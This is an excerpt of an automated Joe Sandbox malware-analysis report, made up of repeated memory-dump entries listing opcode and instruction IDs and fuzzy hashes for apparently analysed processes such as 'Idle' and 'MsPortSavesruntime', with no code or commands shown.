                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4ed4acf919981f74455dc4cc80fb6e6734cc38eca516e527d93556e62a2cdd7c
                                                                                                                    • Instruction ID: a8c984677ea6bffaa03a76e880fb1c141bd80cefdb43eabde135ac57406eaf4c
                                                                                                                    • Opcode Fuzzy Hash: 4ed4acf919981f74455dc4cc80fb6e6734cc38eca516e527d93556e62a2cdd7c
                                                                                                                    • Instruction Fuzzy Hash: 61B01200D5740F01E43433FA086A06970409BC4100FC20270D40C80091D8CD12D4034A
                                                                                                                    • API String ID: 0-3426396564
                                                                                                                    • Opcode ID: 1332c719c76affe887704e93c0b8f7a3fcdb380ca1128a8470250fa08ca4048e
                                                                                                                    • Instruction ID: 9ec78bfb1d555c3c4c2e629127fbce79dfef656486633dc04b785726e2ef7695
                                                                                                                    • Opcode Fuzzy Hash: 1332c719c76affe887704e93c0b8f7a3fcdb380ca1128a8470250fa08ca4048e
                                                                                                                    • Instruction Fuzzy Hash: 6F01D12772A95E8BD641AB7EF8500F8BB40EAD7136B9603F7D044C71A2E551285AC3D0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: c7c5cf8004e59fb520d06a6347ab8f550ef73a922c6764a689015c0a4f7a5274
                                                                                                                    • Instruction ID: 7c7e3fe5fe840c6beee7f75f3c708aad4877dd5d01b886b77be12c4fbca549c3
                                                                                                                    • Opcode Fuzzy Hash: c7c5cf8004e59fb520d06a6347ab8f550ef73a922c6764a689015c0a4f7a5274
                                                                                                                    • Instruction Fuzzy Hash: FCF0C271A0F3C54FCB26A7794829455BF60EE2721178A45FEC086CF1B3E96D888AC701
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: 363512d6012de8f5d14b9cbb054f1e3c9d428e5600f169cdbad5c7567597b232
                                                                                                                    • Instruction ID: ffeeee892d929306c8fd502d9a5c907819b4fa321389c08a6bc81366d807c089
                                                                                                                    • Opcode Fuzzy Hash: 363512d6012de8f5d14b9cbb054f1e3c9d428e5600f169cdbad5c7567597b232
                                                                                                                    • Instruction Fuzzy Hash: A4E0656160E7C44FC716E735886D455BFA0EF6721174A41EFC445CF1A7DA1DC885C711
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: 6dd8f625966fcb3ff15a50463ebbf9ef6c6a6fba0ff2d37a7e59b1081642bab3
                                                                                                                    • Instruction ID: d4962cf6f2fa005dc551cc22f6fdec3fff525516b7be410d01324e12fa6c595d
                                                                                                                    • Opcode Fuzzy Hash: 6dd8f625966fcb3ff15a50463ebbf9ef6c6a6fba0ff2d37a7e59b1081642bab3
                                                                                                                    • Instruction Fuzzy Hash: E4E09271A0E7C44FCB16EB388869454BFA0EF6731174A42EEC086CF1A3EA2DC885C701
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: c80cc55de5fc7e802b9f6503c4b61398171c10264d3b763b005b8737deba6824
                                                                                                                    • Instruction ID: 415c3151f4ef8032bebabac26f204fda3f8a6e1f4024152e09e0f8c7e6de2509
                                                                                                                    • Opcode Fuzzy Hash: c80cc55de5fc7e802b9f6503c4b61398171c10264d3b763b005b8737deba6824
                                                                                                                    • Instruction Fuzzy Hash: FBE06D71A0E7C44FD71AAA348869455BFA0EF6720174A42EFC045CF1A3EA2DC889C701
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d819d2f94384e2138bb157be1f3544612289bf7e297ab99b1622100ced5cf3d4
                                                                                                                    • Instruction ID: 45d76298a0db97efdf859b318a7cf730d26c8086d4cba98ef7f27617917f8eef
                                                                                                                    • Opcode Fuzzy Hash: d819d2f94384e2138bb157be1f3544612289bf7e297ab99b1622100ced5cf3d4
                                                                                                                    • Instruction Fuzzy Hash: 2D412631B19A0D4FE7A4EB58C8A6AF83BE1FF68350F05427AE40DC31E2DD6468014780
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 88d93f3d674f7477135c4f32e1e6f8f87f5b4b387928bd5c394a036cb8c1e04a
                                                                                                                    • Instruction ID: 3c8caea23a100d88e2b41d8dceeab899825d842ea2186c0edd61e73243840cb8
                                                                                                                    • Opcode Fuzzy Hash: 88d93f3d674f7477135c4f32e1e6f8f87f5b4b387928bd5c394a036cb8c1e04a
                                                                                                                    • Instruction Fuzzy Hash: 49414812B0D5590AE724F7BCA4A56F97780DF5933AF0806FBE44ECB1EBCD18A841C284
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ca22a4d5492c3f75c687039d7160beb360d69fefde4f2a90d14953af1b9b8a82
                                                                                                                    • Instruction ID: d80e66af2ff2a6943eba18052f4b6fe8025103c70098ae0a833364b7fb3e21ee
                                                                                                                    • Opcode Fuzzy Hash: ca22a4d5492c3f75c687039d7160beb360d69fefde4f2a90d14953af1b9b8a82
                                                                                                                    • Instruction Fuzzy Hash: 7041C531B1DB198FEB68DB98C8A07F47792EF98350F054279D04ED72D6CA746D468780
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 85200c89f334acdae483fa766940965400d5452c18e5152ba32a8dcb68a49e7d
                                                                                                                    • Instruction ID: 906f325f10b1544acb903f24a2121fda0cec9dc17bc3a6d59e934b64e29af689
                                                                                                                    • Opcode Fuzzy Hash: 85200c89f334acdae483fa766940965400d5452c18e5152ba32a8dcb68a49e7d
                                                                                                                    • Instruction Fuzzy Hash: 1F213811B1D94D0FE798B76C88AA6B977C2EF98321F1101B9E40DC32F6DD64AD418281
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4581c9a670e4d5294f4f72aa8099e619021f216a8caef508dd25ce515cd3afbc
                                                                                                                    • Instruction ID: 64182746838d6b51e8fd7a506dd77ea52e446dc236ec1178965d739c079d3e5e
                                                                                                                    • Opcode Fuzzy Hash: 4581c9a670e4d5294f4f72aa8099e619021f216a8caef508dd25ce515cd3afbc
                                                                                                                    • Instruction Fuzzy Hash: 0131B531A0D68E8FDB56EB64C8649B97FF0EF26300B0905FBC009D71A3DA68A944CB50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 784d1e7436522d3df1593af5143affb13ecfa16456f9b60145bf9c611ccf00c8
                                                                                                                    • Instruction ID: a0c97c0acc248f613b851f17a3c2fbfb12cd1ed807df1f2eae7a5298642e4f79
                                                                                                                    • Opcode Fuzzy Hash: 784d1e7436522d3df1593af5143affb13ecfa16456f9b60145bf9c611ccf00c8
                                                                                                                    • Instruction Fuzzy Hash: 63213031F1950D4BFBB4F79884686B862E1FF58310F6241B9D44ED32B6DE786E418708
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9cc23a87c6e909b4a80405a6e65b803d135be56b2f60a9b403d209a825ec4ca6
                                                                                                                    • Instruction ID: 1f253f5e5197c7ced883bc0e17c2b4734ac58521d306cb90e1619b391f559f97
                                                                                                                    • Opcode Fuzzy Hash: 9cc23a87c6e909b4a80405a6e65b803d135be56b2f60a9b403d209a825ec4ca6
                                                                                                                    • Instruction Fuzzy Hash: B7210735B0E68D8FE331E7A888511EC7FA0EF42314F1642B7C0508B1D3D97816458745
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 089b3b088153c8441b0f6b55c247d9947650a4ee00762ad6f2159fac12ec67c3
                                                                                                                    • Instruction ID: d90dd4e50a86eba40c8c56b3129ddc4d35ca5d47cf4df15e6e587c5f50600429
                                                                                                                    • Opcode Fuzzy Hash: 089b3b088153c8441b0f6b55c247d9947650a4ee00762ad6f2159fac12ec67c3
                                                                                                                    • Instruction Fuzzy Hash: D211E336B0D6020BC329B75CE8A34E43760DF5123FB0801F3E4498E1A7FD1A6895C285
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 64f76c37c6d94a60aa285fe5f31b93e8b451407cc0626bc6b6aa781232d8f67f
                                                                                                                    • Instruction ID: 48d1dd968a9b45aca45901871eed7faed0d1b9fc47b3b0e3ab6a9700496440bc
                                                                                                                    • Opcode Fuzzy Hash: 64f76c37c6d94a60aa285fe5f31b93e8b451407cc0626bc6b6aa781232d8f67f
                                                                                                                    • Instruction Fuzzy Hash: 1F016B36B0C5150AE328F7ACB8728F43790DF5433FB0442B7E5498D0E3EC166049C295
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a2f87d0c626f838d226f25e67d38eb35a06b04c650e21669b8fcb89e5396b233
                                                                                                                    • Instruction ID: 2aa8650e4046a187df07f8414a0af36b480aaa1275deee1cd88d911098b24241
                                                                                                                    • Opcode Fuzzy Hash: a2f87d0c626f838d226f25e67d38eb35a06b04c650e21669b8fcb89e5396b233
                                                                                                                    • Instruction Fuzzy Hash: BE11C635A0E78D8FE722EB6888512EC7FB0EF52315F0646F7C084DB1A3D97416498785
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    • Instruction Fuzzy Hash: 55E01A6154E3C44FCB06EB7488698447FA0AE6B21078A40EEC145CF1B3E62D8949C701
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                    • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                    • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 58dc80f82fff62020c50daaffe5ca4d98f860a7b035311bb60c8cf404992393c
                                                                                                                    • Instruction ID: a25623b79ca096f107e0ad54c48b633179c52f7cb28cd8cf3f5b0b77629b2038
                                                                                                                    • Opcode Fuzzy Hash: 58dc80f82fff62020c50daaffe5ca4d98f860a7b035311bb60c8cf404992393c
                                                                                                                    • Instruction Fuzzy Hash: 17E0462294F7C44FC70B9B3588A88943F70AE2721078A40EBC185CF2B3EA298949C702
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3c1e9055ec28956f497693649066c8855fbaf7837a5b5fd45ef6fa6b0b920d71
                                                                                                                    • Instruction ID: 3c0e14c4324ebe22ea75cace0ade2537fd782c95517db62984c46aaadfd3cbc3
                                                                                                                    • Opcode Fuzzy Hash: 3c1e9055ec28956f497693649066c8855fbaf7837a5b5fd45ef6fa6b0b920d71
                                                                                                                    • Instruction Fuzzy Hash: A3E04F2294F7C04FC74B973488B99457F60DE5721074A41EFC085CF1B3DA198949C711
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ce0594d74662a3e7710401447a1c56f810fad8591153e79ac0b3614562c5ba31
                                                                                                                    • Instruction ID: c2277998880809ceab64d287fd723d811344b58b83f6a113f6022b812cc2b603
                                                                                                                    • Opcode Fuzzy Hash: ce0594d74662a3e7710401447a1c56f810fad8591153e79ac0b3614562c5ba31
                                                                                                                    • Instruction Fuzzy Hash: 9CE09270F0B50E4EF370BBA0C425BB9A2509F50300F0505B8D54E972E2CDFC6D808B89
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                    • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                    • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                    • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0fb3efcf4e2c824c2e53e4771428e456c43f1557ca1d097a1e0362776a8ad338
                                                                                                                    • Instruction ID: fa71dc34f7636e17fe5988646eafb684ac2d073921b1eca0590ebd09541fd8eb
                                                                                                                    • Opcode Fuzzy Hash: 0fb3efcf4e2c824c2e53e4771428e456c43f1557ca1d097a1e0362776a8ad338
                                                                                                                    • Instruction Fuzzy Hash: E1D02230B509040FC70CA73888588707390EB6A20378100A9D00AC72B1EA6ADC88C740
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e90708a79087e72b77d4e0fa24157253c780a8196c08309517985a8ca87fb076
                                                                                                                    • Instruction ID: 39338a1400de4685a22523cad2c097125d9b9ceb574e0406f8d6a26d10e926e6
                                                                                                                    • Opcode Fuzzy Hash: e90708a79087e72b77d4e0fa24157253c780a8196c08309517985a8ca87fb076
                                                                                                                    • Instruction Fuzzy Hash: 9CD01234B519044FC71CA7388C598747791EBAA31679540A9E00AC72B1D96ADD89C781
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 68381363574eaf18cd81102a9ee77ef55bcf49bd13979f4a767ad885cbd449d1
                                                                                                                    • Instruction ID: 081fc227c8d8a9997daee36293996a041011ad2d287f27ab30f74fa48504657b
                                                                                                                    • Opcode Fuzzy Hash: 68381363574eaf18cd81102a9ee77ef55bcf49bd13979f4a767ad885cbd449d1
                                                                                                                    • Instruction Fuzzy Hash: 81D05E20F0DD0F4BEB76EB8888A07B92194AF54300F030635E40DC31B6CE68FA018601
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0459ac410696d2e2134450c8e0d7df9746b7695f4c53fbe190c7fcc484e627f3
                                                                                                                    • Instruction ID: b13b38c8d39ab1264fec170fc920e3c3775d6267c61e36cb0e0be2ca0e863ace
                                                                                                                    • Opcode Fuzzy Hash: 0459ac410696d2e2134450c8e0d7df9746b7695f4c53fbe190c7fcc484e627f3
                                                                                                                    • Instruction Fuzzy Hash: B3D05E05F1D45A56E36AA36408208BA08870F95328F090234E01E863E9EC9C6A0152C3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b764fbe3770bf2e3e072d769b89b0d506276cd4e1d123e9c4e624545fc2e8e70
                                                                                                                    • Instruction ID: b720bbda805eb6feea1ef703b78fb58e0e5b4b83c0fe90d7bb9d259d3c638fab
                                                                                                                    • Opcode Fuzzy Hash: b764fbe3770bf2e3e072d769b89b0d506276cd4e1d123e9c4e624545fc2e8e70
                                                                                                                    • Instruction Fuzzy Hash: 41C04C3052580D8FCA54FB7DC98595476A0FB0D215BD60190E40DC7171E69A9D95D741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction ID: f9bd5b7c055a8adc5226548f1e553392da6241cdc07abab4a0ce757127c62410
                                                                                                                    • Opcode Fuzzy Hash: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction Fuzzy Hash: C3C08C3051180C8FC908FB28C88582833A0FB09300BC20090E008C7174D259DCC0C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4ed4acf919981f74455dc4cc80fb6e6734cc38eca516e527d93556e62a2cdd7c
                                                                                                                    • Instruction ID: db7d7326a4ed3d64de75acb640173bc13af19e40b23d4564a226e3b22930fddb
                                                                                                                    • Opcode Fuzzy Hash: 4ed4acf919981f74455dc4cc80fb6e6734cc38eca516e527d93556e62a2cdd7c
                                                                                                                    • Instruction Fuzzy Hash: 4DB01200D5740F00E83433FA085607970405B44100FD20170D80C81091D8CE12D4034A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bab0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Instruction ID: d77abb9c5a4b1f9fbf6acb1438bf0855950603962f3318c838306cb0dd9ebcc4
                                                                                                                    • Opcode Fuzzy Hash: fcad181a6e7658e16e7bbb73b38649c13dcb5b925a78511a770fd3b79d5424b2
                                                                                                                    • Instruction Fuzzy Hash: 2A215221F1950E4AEBB8EB5884686B862D2FF48700F5241B9E44ED32B2DE786E418714
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 361aee9bcb13f4204747d98d2f769bfe6f155e743077a87614e2649db9c3cc61
                                                                                                                    • Instruction ID: a116c31dcb26057b38b335e5f7d46e37c90fabfc513e1dc710a71d4e9040f822
                                                                                                                    • Opcode Fuzzy Hash: 361aee9bcb13f4204747d98d2f769bfe6f155e743077a87614e2649db9c3cc61
                                                                                                                    • Instruction Fuzzy Hash: CB110637B0A5060BD319A75CECA64E47760EF9523F70803F3F049CE2A7ED159956C280
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
